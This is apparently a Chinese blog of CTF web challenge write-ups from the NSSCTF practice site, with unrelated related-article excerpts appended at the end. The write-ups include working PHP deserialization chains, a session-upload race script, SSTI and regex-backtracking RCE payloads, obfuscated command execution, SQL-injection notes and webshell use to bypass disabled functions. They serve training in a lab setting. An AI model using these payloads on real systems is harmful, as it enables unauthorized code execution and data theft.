NSS刷web3

[HDCTF 2023]SearchMaster在这里插入图片描述

[天翼杯 2021]esay_eval

这题会匹配A或B类
"A":1:
绕不过去 可以考虑快速析构

<?php
class A{
    public $code = "";
    function __call($method,$args){
        eval($this->code);
        
    }
    function __wakeup(){
        $this->code = "";
    }
}

class B{
    public $a;
    function __destruct(){
        echo $this->a->a();
    }
}
$A = new A();
$poc = new B();
$poc -> a = $A;
$A ->code = 'phpinfo();';
echo serialize($poc);

// if(isset($_REQUEST['poc'])){
//     preg_match_all('/"[BA]":(.*?):/s',$_REQUEST['poc'],$ret);
//     if (isset($ret[1])) {
//         foreach ($ret[1] as $i) {
//             if(intval($i)!==1){
//                 exit("you want to bypass wakeup ? no !");
//             }
//         }
//         unserialize($_REQUEST['poc']);    
//     }


// }

生成的序列化字符串手动删除最后一个花括号
然后试了一下system不能用 应该是进disable_functions了
在这里插入图片描述
那直接上蚁剑用插件绕
在这里插入图片描述

[GDOUCTF 2023]受不了一点

在这里插入图片描述

[HNCTF 2022 Week1]easy_html

在这里插入图片描述
在这里插入图片描述

[UUCTF 2022 新生赛]ez_rce

?code=`l''s />1`;

在这里插入图片描述

?code=`t''ac  /fffffffffflagafag>1`;

[GKCTF 2020]CheckIN

Ginkgo传base64加密的payload
然后发现不能用system 看看disable_functions
在这里插入图片描述
拿蚁剑绕
在这里插入图片描述
其中base64解码后是 eval($_POST[1]);
在这里插入图片描述
多试几个 我不知道最终成的是那个

[SWPUCTF 2022 新生赛]ez_ez_php(revenge)

先读flag.php
说在根目录
在这里插入图片描述

[第五空间 2021]EasyCleanup

session包含 条件竞争
早jb忘了 有空重新看一下 这里直接用脚本了

import io
import requests
from threading import Thread

url = 'http://node4.anna.nssctf.cn:28944'
session_id = 'a'


def POST(session):
    file = io.BytesIO(b'a' * 1024 * 5)
    times = 0
    while True:
        session.post(url=url,
                     data={
                         "PHP_SESSION_UPLOAD_PROGRESS": "<?php system('cat /nssctfasdasdflag');echo md5('1');?>"},
                     cookies={'PHPSESSID': session_id},
                     files={"file": ('a.txt', file)},
                     )
        print(f'上传文件{times}')
        times += 1


def GET(session):
    geturl = url + f'?file=/tmp/sess_{session_id}'
    print(geturl)
    while True:
        response = session.get(url=geturl)
        if 'c4ca4238a0b923820dcc509a6f75849b' in response.text:
            print(response.text)
            break
        else:
            print('[+]retry-----')


if __name__ == '__main__':
    with requests.session() as session:
        t1 = Thread(target=POST, args=(session,))
        t1.daemon = True
        t1.start()
        GET(session)

[HNCTF 2022 Week1]easy_upload

直接传一句话就进去了

在这里插入图片描述

[SWPUCTF 2022 新生赛]奇妙的MD5

ffifdyop
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

[HNCTF 2022 Week1]What is Web

在这里插入图片描述

[NISACTF 2022]is secret在这里插入图片描述

RC4是对称密码 这里给key了
在这里插入图片描述

在这里插入图片描述
| 和 read 都不能用
{{lipsum.__globals__.os.popen('cat /f*')['re''ad']()}}
在这里插入图片描述

[WUSTCTF 2020]朴实无华

在这里插入图片描述

[NISACTF 2022]middlerce

在这里插入图片描述
离谱正则 考虑绕正则回溯次数绕过

import requests
payload = '{"cmd":"?><?= `tail /f*`?>","test":"' + "@"*(1000000) + '"}'
res = requests.post("http://node4.anna.nssctf.cn:28625/",
                    data={"letter": payload})
print(res.text)

[LitCTF 2023]Flag点击就送!

session伪造 key是猜的 这题没什么道理
在这里插入图片描述

[HNCTF 2022 Week1]Interesting_http

post 传 want=flag
cookie改admin
XFF改本地

[SWPUCTF 2022 新生赛]numgame

在这里插入图片描述

callUserFunc对大小写不敏感在这里插入图片描述
改NSS2然后查看源码

[NISACTF 2022]join-us

登录处存在sql注入
database被ban了

通过不存在的方法来得到数据库名
然后extractvalue没给ban
在这里插入图片描述
然后在查列名的时候发现column被ban了
题目叫join-us 很容易能想到用join无列名注入

在这里插入图片描述

[HUBUCTF 2022 新生赛]HowToGetShell

在这里插入图片描述

[SWPUCTF 2022 新生赛]1z_unserialize

<?php
 
class lyh{
    public $lt;
    public $lly;
     
     function  __destruct()
     {
        $a = $this->lt;

        $a($this->lly);
     }
    
    
}
$poc = new lyh();
$poc->lt = "system";
$poc->lly = "tac /f*";
echo serialize($poc);

nss=O:3:"lyh":2:{s:2:"lt";s:6:"system";s:3:"lly";s:7:"tac /f*";}

[NSSRound#4 SWPU]1zweb

在这里插入图片描述

[SWPUCTF 2021 新生赛]hardrce_3

在这里插入图片描述
$_=[];$_=@"$_";$_=$_['!'=='@'];$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$____='_';$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$_=$$____;$___($_[_]);

assert($POST[_]);
因为是get 记得url编码
这里发现直接执行命令不行 通过phpinfo得知很多命令都ban了 那么还是考虑写个shell 用蚁剑绕
在这里插入图片描述

[SWPUCTF 2022 新生赛]where_am_i

没头绪
看评论说是社工
那么应该是要电话号码
百度搜图得知 该地点是山水间·古迹酒店 暑袜北一街145号
在这里插入图片描述
把括号删了输入就行

没写明白这题为什么在WEB里

[HNCTF 2022 WEEK2]easy_include

日志文件包含
在这里插入图片描述

[SWPUCTF 2022 新生赛]ez_ez_unserialize


<?php
class X
{
    public $x = __FILE__;
    function __construct($x)
    {
        $this->x = $x;
    }
    function __wakeup()
    {
        if ($this->x !== __FILE__) {
            $this->x = __FILE__;
        }
    }
    function __destruct()
    {
        highlight_file($this->x);
        //flag is in fllllllag.php
    }
}

$p = new X("fllllllag.php");
echo serialize($p);
//O:1:"X":1:{s:1:"x";s:13:"fllllllag.php";}

然后绕一下wakeup
O:1:"X":2:{s:1:"x";s:13:"fllllllag.php";}
在这里插入图片描述

[GDOUCTF 2023]反方向的钟


<?php
error_reporting(0);

// flag.php
class teacher
{
    public $name;
    public $rank;
    private $salary;
    public function __construct($name, $rank, $salary = 10000)
    {
        $this->name = $name;
        $this->rank = $rank;
        $this->salary = $salary;
    }
}

class classroom
{
    public $name;
    public $leader;
    public function __construct($name, $leader)
    {
        $this->name = $name;
        $this->leader = $leader;
    }
    public function hahaha()
    {
        if ($this->name != 'one class' or $this->leader->name != 'ing' or $this->leader->rank != 'department') {
            return False;
        } else {
            return True;
        }
    }
}

class school
{
    public $department;
    public $headmaster;
    public function __construct($department, $ceo)
    {
        $this->department = $department;
        $this->headmaster = $ceo;
    }
    public function IPO()
    {
        if ($this->headmaster == 'ong') {
            echo "Pretty Good ! Ctfer!\n";
            echo new $_POST['a']($_POST['b']);
        }
    }
    public function __wakeup()
    {
        if ($this->department->hahaha()) {
            $this->IPO();
        }
    }
}
$T = new teacher('ing', 'department');
$C = new classroom("one class", $T,);
$p = new school($C, 'ong');
echo base64_encode(serialize($p));
//Tzo2OiJzY2hvb2wiOjI6e3M6MTA6ImRlcGFydG1lbnQiO086OToiY2xhc3Nyb29tIjoyOntzOjQ6Im5hbWUiO3M6OToib25lIGNsYXNzIjtzOjY6ImxlYWRlciI7Tzo3OiJ0ZWFjaGVyIjozOntzOjQ6Im5hbWUiO3M6MzoiaW5nIjtzOjQ6InJhbmsiO3M6MTA6ImRlcGFydG1lbnQiO3M6MTU6IgB0ZWFjaGVyAHNhbGFyeSI7aToxMDAwMDt9fXM6MTA6ImhlYWRtYXN0ZXIiO3M6Mzoib25nIjt9

利用点是new对象 这里我们考虑new原生类
注意SplFileObject是逐行读的 所以我们要用伪协议
在这里插入图片描述

prize_p5

简单看了一下 应该是原生类找文件 然后用escape读
在这里插入图片描述
先开个GlobIterator找flag

<?php
error_reporting(0);

class catalogue
{
    public $class;
    public $data;
    public function __construct($class, $data)
    {
        $this->class = $class;
        $this->data = $data;
    }
    public function __destruct()
    {
        echo new $this->class($this->data);
    }
}

$p = new catalogue("GlobIterator", "/*flag*");
echo serialize($p);
//O:9:"catalogue":2:{s:5:"class";s:12:"GlobIterator";s:4:"data";s:7:"/*flag*";}

在这里插入图片描述

非预期 改16进制
这个点我第一次见
把小s改大写S 然后就可以用十六进制了
?cata=O:9:"catalogue":2:{s:5:"class";S:13:"\53\70\6c\46\69\6c\65\4f\62\6a\65\63\74";s:4:"data";s:5:"/flag";}
预期是字符串逃逸
在这里插入图片描述

[CISCN 2019初赛]Love Math

要尝试构造字母 base_convert()可以任意进制转换
36进制构造phpinfo试试
在这里插入图片描述

然而phpinfo里没有flag
尝试了用system 读了一下当前目录 可以用
但是36进制又弄不出来空格之类的东西 读不了根目录
考虑到hex2bin函数 我们可以先构造hex2bin 然后就可以构造任意字符了
base_convert(37907361743,10,36)(dechex())
在这里插入图片描述

最终payload
c=\$abs=base_convert(37907361743,10,36)(dechex(1598506324));(\$\$abs){1}((\$\$abs){2})&1=system&2=cat \f*

[NCTF 2018]flask真香

在这里插入图片描述

[SWPUCTF 2022 新生赛]xff

在这里插入图片描述

[SWPUCTF 2022 新生赛]js_sign

在这里插入图片描述
hint解码完是tapcode
在这里插入图片描述
加括号里面转小写

[LitCTF 2023]就当无事发生

没环境了

[NSSRound#8 Basic]MyDoor

存在文件包含
日志文件包含给ban了
试试远程 也ban了
尝试伪协议读一下index.php

<?php
error_reporting(0);

if (isset($_GET['N_S.S'])) {
    eval($_GET['N_S.S']);
}

if(!isset($_GET['file'])) {
    header('Location:/index.php?file=');
} else {
    $file = $_GET['file'];

    if (!preg_match('/\.\.|la|data|input|glob|global|var|dict|gopher|file|http|phar|localhost|\?|\*|\~|zip|7z|compress/is', $file)) {
        include $file;
    } else {
        die('error.');
    }
}

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/55628.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

DLA :pytorch添加算子

pytorch的C extension写法 这部分主要介绍如何在pytorch中添加自定义的算子(例如&#xff0c;您可能希望 使用您在论文中找到的新颖激活函数&#xff0c;或实现操作 您作为研究的一部分进行了开发。)&#xff0c;需要以下cuda基础。就总体的逻辑来说正向传播需要输入数据&#…

Stable Diffusion AI绘画学习指南【插件安装设置】

插件安装的方式 可用列表方式安装&#xff0c;点开Extensions 选项卡&#xff0c;找到如下图&#xff0c;找到Available选项卡&#xff0c;点load from加载可用插件&#xff0c;在可用插件列表中找到要装的插件按install 按扭按装&#xff0c;安装完后(Apply and restart UI)应…

React(4)

1.属性&#xff08;props&#xff09;初始 状态state都是组件内部写的&#xff0c;也就是A组件内的state就只能A组件里面用&#xff0c;其他组件复用不了。因此属性props就可以。 比如一个导航栏&#xff0c;首页有&#xff0c;购物车有&#xff0c;我的有&#xff0c;他们三个…

数据可视化(4)散点图及面积图

1.简单散点图 #散点图 #scatter(x,y) x数据&#xff0c;y数据 x[i for i in range(10)] y[random.randint(1,10) for i in range(10)] plt.scatter(x,y) plt.show()2.散点图分析 #分析广告支出与销售收入相关性 dfcarpd.read_excel(广告支出.xlsx) dfdatapd.read_excel(销售…

NSX多租户之旅

从多租户数据面到完整的多租户框架 我们很高兴地宣布NSX中的Projects这一项新功能&#xff0c;可以对NSX部署的多个租户进行细粒度的资源管理。 Projects提供灵活的资源分配和管理&#xff0c;将NSX的多租户支持提升到新的水平。企业管理员可以将平台划分为不同Projects&…

【数据结构】27.移除元素

&#x1f490; &#x1f338; &#x1f337; &#x1f340; &#x1f339; &#x1f33b; &#x1f33a; &#x1f341; &#x1f343; &#x1f342; &#x1f33f; &#x1f344;&#x1f35d; &#x1f35b; &#x1f364; &#x1f4c3;个人主页 &#xff1a;阿然成长日记 …

Scratch 教程 -- 如何绘制像素画

1.像素画的定义 像素画就是以1像素的正方形为最小单位画的画&#xff0c;且物体有明显的分界线 这是像素画 这不是像素画 来看这两个法棍 这是像素画 这不是像素画 为什么第二个不是像素画&#xff1f;因为不能区分边缘和物体&#xff0c;它们之间有很多过渡色。 中间的过渡色属…

Spring依赖注入

文章目录 前言1.依赖注入简介2. setter注入3. 构造器注入4. 自动装配 总结 前言 为了巩固所学的知识&#xff0c;作者尝试着开始发布一些学习笔记类的博客&#xff0c;方便日后回顾。当然&#xff0c;如果能帮到一些萌新进行新技术的学习那也是极好的。作者菜菜一枚&#xff0…

Sublime操作技巧笔记

同时选中2个文件&#xff1a;自动切换成左右2个界面 格式化代码ctrlshifth&#xff1a; 使用快捷键ctrl shift p调出控制台&#xff0c;输入install package&#xff0c;然后输入html-css-js prettify&#xff0c;进行下载。具体的快捷键在preference > package setting &g…

【深度学习】Inst-Inpaint: Instructing to Remove Objects with Diffusion Models,指令式图像修复

论文&#xff1a;https://arxiv.org/abs/2304.03246 code:http://instinpaint.abyildirim.com/ 文章目录 AbstractIntroductionRelated WorkDataset GenerationMethodPS Abstract 图像修复任务是指从图像中擦除不需要的像素&#xff0c;并以语义一致且逼真的方式填充它们。传统…

springboot对静态资源的支持

1、spring boot默认静态路径支持 Spring Boot 默认将 / 所有访问映射到以下目录&#xff1a;** classpath:/static classpath:/public classpath:/resources classpath:/META-INF/resources也就是说什么也不用配置&#xff0c;通过浏览器可以直接访问这几个目录下的文件。 1…

Spring之BeanDefinition(二)

Spring之BeanDefinition 文章目录 Spring之BeanDefinition1、对象和bean的区别2、BeanDefinition作用AutowireCandidate说明Primary说明ConstructorArgumentValues说明第一种使用方式第二种使用方式 MutablePropertyValuesabstract小结 3、BeanDefinition的发展历程3、BeanDefi…

C++ 类的友元

【例1】 将数据与处理数据的函数封装在一起&#xff0c;构成类&#xff0c;既实现了数据的共享又实现了隐藏&#xff0c;无疑是面向对象程序设计的一大优点。但是封装并不总是绝对的。现在考虑一个简单的例子&#xff0c;就是Point类&#xff0c;每一个Point类的对象代表一个“…

阿里云服务器免费试用及搭建WordPress网站

文章目录 前言一、免费试用1、选择使用产品2、进行产品配置3、远程连接阿里云服务器①、重置实例密码②、SecureCRT 远程链接③、Workbench 远程链接二、搭建 WordPress 网站1、开放搭建 WordPress 需要的端口2、搭建 LAMP 环境①、Linux 系统升级和更新源②、安装 Apache2③、…

LAXCUS分布式操作系统引领科技潮流,进入百度首页

信息源自某家网络平台&#xff0c;以下原样摘抄贴出。 随着科技的飞速发展&#xff0c;分布式操作系统做为通用基础平台&#xff0c;为大数据、高性能计算、人工智能提供了强大的数据和算力支持&#xff0c;已经成为了当今计算机领域的研究热点。近日&#xff0c;一款名为LAXCU…

云原生势不可挡,如何跳离云原生深水区?

云原生是云计算领域一大热词&#xff0c;伴随云原生概念而来的是数字产业迎来井喷、数字变革来临、数字化得以破局以及新一波的技术红利等等。云原生即“云”原生&#xff0c;顾名思义是让“应用”最大程度地利用云的能力&#xff0c;发挥云价值的最佳路径。具体来说&#xff0…

通向架构师的道路之apache性能调优

一、总结前一天的学习 在前两天的学习中我们知道、了解并掌握了Web Server结合App Server实现单向Https的这样的一个架构。这个架构是一个非常基础的J2ee工程上线布署时的一种架构。在前两天的教程中&#xff0c;还讲述了Http服务 器、App Server的最基本安全配置&#xff08;…

解决单节点es索引yellow

现象 单节点的es&#xff0c;自动创建索引后&#xff0c;默认副本个数为1&#xff0c;索引状态为yellow 临时解决 修改副本个数为0 永久解决 方法1、修改elasticsearch.yml文件&#xff0c;添加配置并重启es number_of_replicas&#xff1a;副本分片数&#xff0c;默认…

【疑难解决】EasyCVR告警消息生成后,合成录像不显示的原因排查

有用户反馈&#xff0c;视频监控汇聚平台EasyCVR对接了摄像头告警信息&#xff0c;但是平台没有告警信息上来。 技术人员配合项目现场排查&#xff0c;TSINGSEE青犀视频安防监控平台EasyCVR平台端已经配置了告警预案&#xff0c;并且也开启了告警开关&#xff0c;用户的配置流程…

docker简单web管理docker.io/uifd/ui-for-docker

要先pull这个镜像docker.io/uifd/ui-for-docker 这个软件默认只能使用9000端口&#xff0c;别的不行&#xff0c;因为作者在镜像制作时已加入这一层 刚下下来镜像可以通过docker history docker.io/uifd/ui-for-docker 查看到这个端口已被 设置 如果在没有设置br0网关时&…